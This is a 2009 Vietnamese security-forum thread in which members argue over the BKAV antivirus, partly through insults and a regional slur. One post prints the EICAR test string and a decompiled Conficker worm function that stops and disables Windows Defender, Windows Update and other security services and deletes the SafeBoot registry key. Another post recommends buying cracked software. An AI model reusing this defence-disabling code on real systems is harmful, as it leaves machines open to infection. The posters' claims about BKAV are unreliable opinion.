  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 02:14:29 (+0700) | #50 | 176382
[Avatar]
 angel_of_devil
Member
[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]

Nowhereman wrote:
sài Bkav có ngày bị theo dõi cũng nên ( vì nhiều lý do mà . ví dụ nhé lý do theo dõi khách hàng và update từ xa ( remote install and update ), ly do qản lý users "HỘ" các ISP và PC15 chẳng hạn xem ku nào nghịch zi\ ke ke ke ) tóm lại tớ vẫn khuyên KHÔNG NÊN SÀI BKAV trong mọi trường hợp. thêm nữa là công nghệ tìm diệt chuyên đi SAU và NHÁI lại theo công nghệ cao thủ của nước ngoài . Tớ ví dụ luôn giống như họ đang hô hào sự lên đời qua bài " Những tiết lộ đầu tiên về Bkav 2009 http://www.bkav.com.vn/tieu_diem/17/02/2009/8/2139/ <<< " trong này có nói đến tìm diệt theo kiểu " Công nghệ nhận diện virus thông minh (Heuristic), công nghệ quét thông minh (Smart Scan) và công nghệ tự bảo vệ trước tấn công (Sefl Defense) sẽ được đưa vào sử dụng. Ngoài ra, các tính năng nâng cao cũng được áp dụng như: Quick Scan (quét nhanh) Full scan (quét toàn bộ hệ thống), Deep scan (quét sâu)… " <<<< ke ke ke

Chúa ơi . các bác biết không tất cả những CÔNG NGHỆ mà BKAV "tiết lộ " SẼ CÓ smilie trong Bkav 2009 thì đã được nhiều hãng và nhiều trình diệt virus tiếng tăm đưa ra ứng dụng từ những năm 2003 và họ ngày càng hoàn thiện sau 6 năm nay rồi thì bác Bkav mới biết nhái nhái lại tí để dọa ma thiên hạ .

ở đây tớ lấy ví dụ về eTrust Antivirus của CA . -->> chỉ với 10 - 15 ngàn đồng việt nam các bác có thể mua ở các tiệm bán đĩa PC /software bản crack mới nhất của gần hết các trình diệt virust tuyệt vời và Spy , warm wares nữa chứ ??? ôh . các bác cứ mua về sài và kiểm chứng những gì tớ nói đi. hoặc lên Google mà search về những công nghệ đó.

Finally . Suy nghĩ cho kỹ trước khi sài BKAV và đồng thời muốn trở thành một Netter smilie . thêm tí nữa là . THÔNG THƯỜNG là không bao giờ cha đẻ ra công nghệ cao và các ứng dụng rộng rãi ( Microsoft , IBM, Sun...) lại không HIỂU bằng, và không có những sản phẩm tìm diệt vi rút TỐT hơn BKav. và đương nhiên Bkis không là ngoại lệ .


một vài í ciến.


 


Xin phép nói lại, tôi chả bực j, chỉ thấy nực cười thôi. Bây giờ, xin mời bạn dẫn chứng những phần tôi bôi đậm những gì bạn nói. Vả lại theo tôi biết, Microsoft, IBM, Sun chả có những sản phẩm diệt virus tốt như bạn nói. Ai nói nhăng nói cuội ở đây thì hãy để members nhận xét. Thế thôi
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 02:36:49 (+0700) | #51 | 176387
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]


to : angel_of_devil


trích " THÔNG THƯỜNG là không bao giờ cha đẻ ra công nghệ cao và các ứng dụng rộng rãi ( Microsoft , IBM, Sun...) lại không HIỂU bằng, và không có những sản phẩm tìm diệt vi rút TỐT hơn BKav.."

đúng câu trên đây tớ viết nhưng ấy đọc mà hình như chẳng hiểu gì thì phải. thế tớ hỏi ấy dựa vào đâu để các tay viết virus viết ra những virus quậy phá ??? những tay viết virus cũng như những người lập trình ra phần mềm diệt virus phải là những người rất hiểu về HỆ THỐNG của OS và các CÔNG NGHỆ và ỨNG DỤNG liên quan như là MẠNG ( NEWORK ) hay gì gì đó . .. ấy hiểu chưa nhỉ ... ấy đọc và nên hiểu rộng ra đừng xét đoán câu chữ . nếu như bản thân ấy thấy nực cười thì chứng tỏ ấy tớ thua ấy . thế thôi . ke ke ke

ấy hiểu ý câu tớ nói " cha đẻ ra công nghệ cao và các ứng dụng " là gì nào ???

không lẽ Bkis việt nam là cha đẻ ra các công nghệ đó ??? ke ke ke ..

họ có thể rất giỏi trong lĩnh vực học hỏi và phát triển lại những công nghệ đó . (ví dụ như mã mở của dòng Nix*) nhưng SỰ THẬT họ không phải cha đẻ ra Windows , Network.v.v.


ấy hiểu rộng ra tí nha . đừng thấy bảo 1 + 1 = 2 là cả đời chỉ biết có vậy nhé . ke ke .

nào chúng ta hãy nói về virus nào .

P/s : à quên còn dẫn chứng à bạn vào đây nhé .

/hvaonline/posts/list/28588.html <<< rồi làm theo như tớ hướng

dẫn . bạn chắc chắn sẽ thấy được tất cả những dẫn chứng rất cụ thể .


chúc vui. còn bạn vẫn cố tình KHÔNG THẤY, hoặc không thấy thật thì . tạm biệt bạn tớ cũng Thua bạn nha . tớ xin thua nha ke ke ke .





lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 03:01:54 (+0700) | #52 | 176392
[Avatar]
 angel_of_devil
Member
[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
THÔNG THƯỜNG là không bao giờ cha đẻ ra công nghệ cao và các ứng dụng rộng rãi ( Microsoft , IBM, Sun...) lại không HIỂU bằng, và không có những sản phẩm tìm diệt vi rút TỐT hơn BKav.. 


đúng câu trên đây tớ viết nhưng ấy đọc mà hình như chẳng hiểu gì thì phải. thế tớ hỏi ấy dựa vào đâu để các tay viết virus viết ra những virus quậy phá ??? những tay viết virus cũng như những người lập trình ra phần mềm diệt virus phải là những người rất hiểu về HỆ THỐNG của OS và các CÔNG NGHỆ và ỨNG DỤNG liên quan như là MẠNG ( NEWORK ) hay gì gì đó . .. ấy hiểu chưa nhỉ ... ấy đọc và nên hiểu rộng ra đừng xét đoán câu chữ . nếu như bản thân ấy thấy nực cười thì chứng tỏ ấy tớ thua ấy . thế thôi . ke ke ke  


Ai giải thích dùm e với, bạn ý bảo em chả hiểu j cả. Thú thật là với cách giải thích này, em vẫn chả hiểu 2 cái quote này ăn nhập với nhau ở điểm nào.

Và cái chính là ông bạn dẫn chứng dùm tôi mấy cái ông bạn nói mà tôi bôi đậm dùm anh em cái. Nếu ko dẫn chứng đc thì nên xem lại mình đi smilie
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 03:25:34 (+0700) | #53 | 176396
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]
to : angel_of_devil

đề nghị ấy xem 2 đoạn mã code sau đây: nếu ấy hiểu thì tớ nói chuyện tiếp, còn không hiểu gì thì chúng ta không nên tranh lận nhiều nữa vì hai lý do sau đây:

A) tớ đang tranh luận với một người học về chuyên ngành xã hội ( như lịch sử , văn hóa, văn học, địa lý, ngoại ngữ ...) ke ke ke

B) rất mất thời gian và không gian của các member khác.

==============Code ==================================

đoạn code 1 => X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR


đoạn code 2 :


BOOL disable_security_services_and_terminate_conficker_cleaners()
{
HANDLE v;
void *ThreadId;

ThreadId = this;
disable_security_service("wscsvc");
disable_security_service("WinDefend");
disable_security_service("wuauserv");
disable_security_service("BITS");
disable_security_service("ERSvc");
disable_security_service("WerSvc");
SHDeleteValueA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion
\\Run", "Windows Defender");
callSHDeleteKeyW(
HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\ShellServiceObjects\\
{FD6905CE-952F-41F1-9A6F-135D9C6622CC}");
callSHDeleteKeyW(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot");
v = CreateThread(0, 0, monitor_and_terminate_conficker_cleaners, 0, 0, (DWORD *)
&ThreadId);
return CloseHandle(v);
}

int disable_security_service(LPCSTR lpServiceName)
{
void *hSCObject;
char ServiceStatus;
int v;

result = 0;
hSCObject = OpenSCManagerA(0, 0, SC_MANAGER_ALL_ACCESS);
// open service manager with all access granted
if ( hSCObject )
{
v = OpenServiceA(hSCObject, lpServiceName, 0x20027u);
// open the specified service
if ( v )
{
if ( QueryServiceStatus(v, (struct _SERVICE_STATUS *)&ServiceStatus) )
// query the service status
{
if ( ServiceType != SERVICE_KERNEL_DRIVER )
// check if the service is not a device driver
{
success = ControlService(v, 1u, (struct _SERVICE_STATUS *)
&ServiceStatus); // notifies the service that it should stop
if ( success )
Sleep(4000); // sleep 4 seconds
}
}
result |= ChangeServiceConfigA(v, 0xFFFFFFFFu, 4u, 0xFFFFFFFFu,
0, 0, 0, 0, 0, 0, 0);
// set the service configuration so that the service is never started
CloseServiceHandle(v);
}
CloseServiceHandle(hSCObject);
}
return result;
}


=== > Lưu ý đây không phải đoạn code của tớ viết, mà đây là một phần công việc của tớ phải tìm hiểu <==========================


lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 03:39:03 (+0700) | #54 | 176399
[Avatar]
 angel_of_devil
Member
[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
Uh tôi là dân ít chữ, nhưng cũng đủ để biết cái đoạn code kia là để chứng minh rằng BKAV nó mù màu với với đoạn mã nếu đc save thành 1 file thực thi, chứ ko bị phát hiện như các AV khác. Còn đoạn dưới chắc là tiến trình hoạt động của Conficker. Nhưng mà để làm j nhỉ? Giải thích cho các đoạn bôi đậm là đây sao smilie
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 04:11:41 (+0700) | #55 | 176403
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]

to all :

a) angel _of_devil chính hãng là dân văn chương ke ke ke . => tớ xin THUA ke ke smilie

b) hoàn toàn không nên sài BKAV .

một vài í ciến.



lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 04:15:57 (+0700) | #56 | 176406
[Avatar]
 angel_of_devil
Member
[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
Vâng em là dân văn chương, em NGỜ U quá, chả hiểu mấy cái phần lúc nãy anh nói mà em bôi đậm màu cam cho lắm, anh giải thích mấy chỗ khúc mắc đó dùm em cái smilie

P/S: mà "sài" này là Sài Đồng hay Sài Gòn thì phải smilie) Nhiều chữ có khác smilie
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 04:54:18 (+0700) | #57 | 176414
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]

tớ xin thua rùi mừ .. hì hì angel_of_devil đáng iêu wa' . tớ không nói đến ít chữ hay nhiều chữ ấy nói trước nghe. tớ chỉ nói đến loạn chữ thui ke ke ke

quả thật angle_of_devil nhiều chữ ke ke ke smilie angle_of_devil là người bắc roài ..ke ke .

tớ người Sài Gòn đó. bắc kỳ chỉ lấy thuốc dúm làm thuốc đánh răng là hay ke ke ke smilie

lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 05:16:17 (+0700) | #58 | 176421
[Avatar]
 angel_of_devil
Member
[Minus]    0    [Plus]
Joined: 23/10/2004 14:57:09
Messages: 154
Offline
[Profile] [PM]
Làm đàn ông thì đàng hoàng một tí đi. Nói xằng nói bậy, võ đoán linh tinh xong giở giọng cù nhầy ko thấy ngượng à? Lại còn Nam Kỳ với Bắc Kỳ nữa. Bó tay smilie
Ngoảnh nhìn lại cuộc đời như giấc mộng
Được mất bại thành bỗng chốc hoá hư không
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 06:07:28 (+0700) | #59 | 176438
Nowhereman
Elite Member
[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]

angel_of_devil wrote:
Làm đàn ông thì đàng hoàng một tí đi. Nói xằng nói bậy, võ đoán linh tinh xong giở giọng cù nhầy ko thấy ngượng à? Lại còn Nam Kỳ với Bắc Kỳ nữa. Bó tay smilie 


to angel_of_devi :

ấy lại " Nói xằng nói bậy, võ đoán linh tinh xong giở giọng cù nhầy ..." nữa rồi. ke ke ke smilie smilie.

lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Virut xuất xứ từ TQ, gây nguy hại cho mạng LAN 10/04/2009 09:26:47 (+0700) | #60 | 176477
[Avatar]
 bolzano_1989
Journalist
[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

angel_of_devil wrote:

Nowhereman wrote:
sài Bkav có ngày bị theo dõi cũng nên ( vì nhiều lý do mà . ví dụ nhé lý do theo dõi khách hàng và update từ xa ( remote install and update ), ly do qản lý users "HỘ" các ISP và PC15 chẳng hạn xem ku nào nghịch zi\ ke ke ke ) tóm lại tớ vẫn khuyên KHÔNG NÊN SÀI BKAV trong mọi trường hợp. thêm nữa là công nghệ tìm diệt chuyên đi SAU và NHÁI lại theo công nghệ cao thủ của nước ngoài . Tớ ví dụ luôn giống như họ đang hô hào sự lên đời qua bài " Những tiết lộ đầu tiên về Bkav 2009 http://www.bkav.com.vn/tieu_diem/17/02/2009/8/2139/ <<< " trong này có nói đến tìm diệt theo kiểu " Công nghệ nhận diện virus thông minh (Heuristic), công nghệ quét thông minh (Smart Scan) và công nghệ tự bảo vệ trước tấn công (Sefl Defense) sẽ được đưa vào sử dụng. Ngoài ra, các tính năng nâng cao cũng được áp dụng như: Quick Scan (quét nhanh) Full scan (quét toàn bộ hệ thống), Deep scan (quét sâu)… " <<<< ke ke ke

Chúa ơi . các bác biết không tất cả những CÔNG NGHỆ mà BKAV "tiết lộ " SẼ CÓ smilie trong Bkav 2009 thì đã được nhiều hãng và nhiều trình diệt virus tiếng tăm đưa ra ứng dụng từ những năm 2003 và họ ngày càng hoàn thiện sau 6 năm nay rồi thì bác Bkav mới biết nhái nhái lại tí để dọa ma thiên hạ .

ở đây tớ lấy ví dụ về eTrust Antivirus của CA . -->> chỉ với 10 - 15 ngàn đồng việt nam các bác có thể mua ở các tiệm bán đĩa PC /software bản crack mới nhất của gần hết các trình diệt virust tuyệt vời và Spy , warm wares nữa chứ ??? ôh . các bác cứ mua về sài và kiểm chứng những gì tớ nói đi. hoặc lên Google mà search về những công nghệ đó.

Finally . Suy nghĩ cho kỹ trước khi sài BKAV và đồng thời muốn trở thành một Netter smilie . thêm tí nữa là . THÔNG THƯỜNG là không bao giờ cha đẻ ra công nghệ cao và các ứng dụng rộng rãi ( Microsoft , IBM, Sun...) lại không HIỂU bằng, và không có những sản phẩm tìm diệt vi rút TỐT hơn BKav. và đương nhiên Bkis không là ngoại lệ .


một vài í ciến.


 


Xin phép nói lại, tôi chả bực j, chỉ thấy nực cười thôi. Bây giờ, xin mời bạn dẫn chứng những phần tôi bôi đậm những gì bạn nói. Vả lại theo tôi biết, Microsoft, IBM, Sun chả có những sản phẩm diệt virus tốt như bạn nói. Ai nói nhăng nói cuội ở đây thì hãy để members nhận xét. Thế thôi 

Hì mình thấy MS có phát triển Microsoft Malicious Software Removal Tool . Tuy lượng malware mà Microsoft Malicious Software Removal Tool diệt được không nhiều so với các AV nhưng nó có những điểm nhấn tốt , với những hiểm họa mang tính quốc tế như sâu Conficker... Microsoft Malicious Software Removal Tool xử lí rất tốt , lại được cập nhật hàng tuần nữa .
Những đoạn màu cam bạn tô đậm còn lại thì đều hợp lí cả , vấn đề này đã được trao đổi nhiều ở các topic khác .
À mình có xem qua blog của Huyền, thấy dễ thương thiệt smilie .
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
Go to Page:  First Page Page 1 Page 3 Last Page
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|